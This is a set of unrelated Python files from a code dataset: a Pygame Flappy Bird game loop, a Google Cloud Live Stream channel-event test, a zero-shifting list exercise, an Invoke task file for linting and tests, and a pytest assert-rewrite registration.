    labels on the game-over screen."""
    if game_active:
        score_surface = game_font.render(str(score), True, (255,255,255))
        score_rect = score_surface.get_rect(center = (288,100))
        screen.blit(score_surface, score_rect)
    else:
        score_surface = game_font.render(f'Score: {score}', True, (255,255,255))
        score_rect = score_surface.get_rect(center = (288,100))
        screen.blit(score_surface, score_rect)
        high_score_surface = game_font.render(f'High score: {high_score}', True, (255,255,255))
        high_score_rect = high_score_surface.get_rect(center = (288,850))
        screen.blit(high_score_surface, high_score_rect)
def update_score(score, high_score):
    """Return the larger of the current score and the stored high score."""
    if score > high_score:
        return score
    return high_score
def pipe_score_check():
    """Award one point when a pipe pair passes the bird's x position (~100).

    Only even indices are checked because pipe_list holds alternating
    (bottom, top) pairs; the 98..102 window catches the 2 px/frame scroll
    exactly once per pair.
    """
    global score
    for i in range(0, len(pipe_list), 2):
        if 98 < pipe_list[i].centerx < 102:
            score += 1
            score_sound.play()
# --- Pygame setup: 576x1024 window, frame clock, score font. ---
pygame.init()
screen = pygame.display.set_mode((576,1024))
clock = pygame.time.Clock()
game_font = pygame.font.Font('04B_19.ttf', 40)

# game variables
gravity = 0.25
bird_movement = 0  # current vertical speed (px/frame); negative = rising
game_active = True
score = 0
high_score = 0

bg_surface = pygame.image.load('assets/background-day.png').convert() # easier for pygame to work with
bg_surface = pygame.transform.scale(bg_surface, (576,1024))

floor_surface = pygame.image.load('assets/base.png').convert()
floor_surface = pygame.transform.scale2x(floor_surface)
floor_x_pos = 0

# Bird flap frames; bird_index cycles through them for the flap animation.
bird_downflap = pygame.transform.scale2x(pygame.image.load('assets/yellowbird-downflap.png').convert_alpha())
bird_midflap = pygame.transform.scale2x(pygame.image.load('assets/yellowbird-midflap.png').convert_alpha())
bird_upflap = pygame.transform.scale2x(pygame.image.load('assets/yellowbird-upflap.png').convert_alpha())
bird_frames = [bird_downflap, bird_midflap, bird_upflap]
bird_index = 1
bird_surface = bird_frames[bird_index]
bird_rect = bird_surface.get_rect(center = (100,512))
BIRDFLAP = 0  # frame counter driving the flap animation (advances every 7 frames)

pipe_surface = pygame.image.load('assets/pipe-green.png').convert()
pipe_surface = pygame.transform.scale2x(pipe_surface)
pipe_list = []
SPAWNPIPE = 60  # frame counter; a new pipe pair spawns every 170 frames

game_over_surface = pygame.transform.scale2x(pygame.image.load('assets/message.png').convert_alpha())
game_over_rect = game_over_surface.get_rect(center = (288,512))

flap_sound = pygame.mixer.Sound('sound/sfx_wing.wav')
hit_sound = pygame.mixer.Sound('sound/sfx_hit.wav')
death_sound = pygame.mixer.Sound('sound/sfx_die.wav')
score_sound = pygame.mixer.Sound('sound/sfx_point.wav')

# --- Main game loop (runs at 120 FPS; exits via the window close event). ---
while True:
    # Advance the flap animation every 7th frame.
    BIRDFLAP = (BIRDFLAP + 1) % 7
    if BIRDFLAP == 0:
        bird_index = (bird_index + 1) % 3
        bird_surface, bird_rect = bird_animation()
    # Spawn a new pipe pair every 170th frame.
    SPAWNPIPE = (SPAWNPIPE + 1) % 170
    if SPAWNPIPE == 0:
        pipe_list.extend(create_pipe())
    for event in pygame.event.get():
        if event.type == pygame.QUIT:
            pygame.quit()
            sys.exit()
        if event.type == pygame.KEYDOWN:
            if event.key == pygame.K_SPACE:
                if game_active:
                    # Flap: give the bird an upward impulse.
                    bird_movement = -8.5
                    flap_sound.play()
                else:
                    # Restart after game over: reset pipes, bird, and score.
                    game_active = True
                    pipe_list.clear()
                    bird_rect.center = (100,512)
                    bird_movement = 0
                    score = 0
    screen.blit(bg_surface, (0,0))
    if game_active:
        # bird
        bird_movement += gravity
        rotated_bird = rotate_bird(bird_surface)
        bird_rect.centery += bird_movement
        screen.blit(rotated_bird, bird_rect)
        game_active = check_collision(pipe_list)
        # pipes
        pipe_list = move_pipes(pipe_list)
        draw_pipes(pipe_list)
        # score
        pipe_score_check()
        score_display()
    else:
        screen.blit(game_over_surface, game_over_rect)
        high_score = update_score(score, high_score)
        score_display()
    # floor
    floor_x_pos -= 2
    draw_floor()
    if floor_x_pos <= -576:
        floor_x_pos = 0
    pygame.display.update()
    clock.tick(120)
| StarcoderdataPython |
310004 | # Copyright 2022 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import uuid
import pytest
import create_channel
import create_channel_event
import create_input
import delete_channel
import delete_channel_event
import delete_input
import get_channel_event
import list_channel_events
import start_channel
import stop_channel
# GCP project/region used by the channel-event samples under test.
# Resource IDs are uuid-suffixed so concurrent test runs don't collide.
project_name = os.environ["GOOGLE_CLOUD_PROJECT"]
location = "us-central1"
input_id = f"python-test-input-{uuid.uuid4()}"
channel_id = f"python-test-channel-{uuid.uuid4()}"
event_id = f"python-test-event-{uuid.uuid4()}"
output_bucket_name = f"python-test-bucket-{uuid.uuid4()}"
output_uri = f"gs://{output_bucket_name}/channel-test/"
def test_channel_event_operations(capsys: pytest.fixture) -> None:
    """End-to-end channel-event lifecycle: create an input and channel, start
    the channel, exercise event create/get/list/delete, then stop and delete
    everything. Each sample's stdout is checked for the resource name."""
    # Set up
    channel_name_project_id = (
        f"projects/{project_name}/locations/{location}/channels/{channel_id}"
    )
    event_name_project_id = f"projects/{project_name}/locations/{location}/channels/{channel_id}/events/{event_id}"

    create_input.create_input(project_name, location, input_id)
    create_channel.create_channel(
        project_name, location, channel_id, input_id, output_uri
    )
    out, _ = capsys.readouterr()
    assert channel_name_project_id in out

    start_channel.start_channel(project_name, location, channel_id)
    out, _ = capsys.readouterr()
    assert "Started channel" in out

    # Tests
    create_channel_event.create_channel_event(
        project_name, location, channel_id, event_id
    )
    out, _ = capsys.readouterr()
    assert event_name_project_id in out

    get_channel_event.get_channel_event(project_name, location, channel_id, event_id)
    out, _ = capsys.readouterr()
    assert event_name_project_id in out

    list_channel_events.list_channel_events(project_name, location, channel_id)
    out, _ = capsys.readouterr()
    assert event_name_project_id in out

    delete_channel_event.delete_channel_event(
        project_name, location, channel_id, event_id
    )
    out, _ = capsys.readouterr()
    assert "Deleted channel event" in out

    # Clean up
    stop_channel.stop_channel(project_name, location, channel_id)
    out, _ = capsys.readouterr()
    assert "Stopped channel" in out

    delete_channel.delete_channel(project_name, location, channel_id)
    out, _ = capsys.readouterr()
    assert "Deleted channel" in out

    delete_input.delete_input(project_name, location, input_id)
| StarcoderdataPython |
4930461 | <reponame>eclipse-ib/Software-University-Fundamentals_Module
# Read comma-separated integers and print them with every zero moved to the
# end, preserving the order of the non-zero values.
tokens = input().split(", ")
values = [int(token) for token in tokens]
shifted = [value for value in values if value != 0]
shifted += [0] * (len(values) - len(shifted))
print(f"{shifted}")
| StarcoderdataPython |
5002903 | import subprocess
from invoke import task
# Invoke task constants: package under test, test tree roots, coverage config.
SRC_DIR = "signal_interpreter_server"
TEST_DIR = "tests"
UNIT_DIR = "tests/unit"
INTEGRATION_DIR = "tests/integration"
COV_PATH = ".coveragerc"
@task
def style(_):
    """Run pycodestyle over the source package (long lines ignored).

    NOTE(review): subprocess.call's exit code is discarded, so the task never
    fails CI on violations — confirm whether that is intended.
    """
    cmd = f"pycodestyle {SRC_DIR} --ignore=E501"
    subprocess.call(cmd, shell=True)
@task
def style_test(_):
    """Run pycodestyle over the test tree (long lines ignored)."""
    cmd = f"pycodestyle {TEST_DIR} --ignore=E501"
    subprocess.call(cmd, shell=True)
@task
def lint(_):
    """Run pylint over the source package."""
    cmd = f"pylint {SRC_DIR}"
    subprocess.call(cmd, shell=True)
@task
def lint_test(_):
    """Run pylint over the test tree."""
    cmd = f"pylint {TEST_DIR}"
    subprocess.call(cmd, shell=True)
@task
def unit_test(_):
    """Run the unit tests with coverage measured over the source package."""
    cmd = f"python -m pytest {UNIT_DIR} --cov {SRC_DIR} --cov-config={COV_PATH}"
    subprocess.call(cmd, shell=True)
@task
def integration_test(_):
    """Run the integration tests with coverage; fails under 75% coverage."""
    cmd = f"python -m pytest {INTEGRATION_DIR} --cov {SRC_DIR} --cov-config={COV_PATH} --cov-fail-under=75"
    subprocess.call(cmd, shell=True)
8044240 | import pytest
# Register the shared integration-test utils module for pytest assertion
# rewriting so its helper asserts produce descriptive failure messages.
pytest.register_assert_rewrite("services.ui_backend_service.tests.integration_tests.utils")
| StarcoderdataPython |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.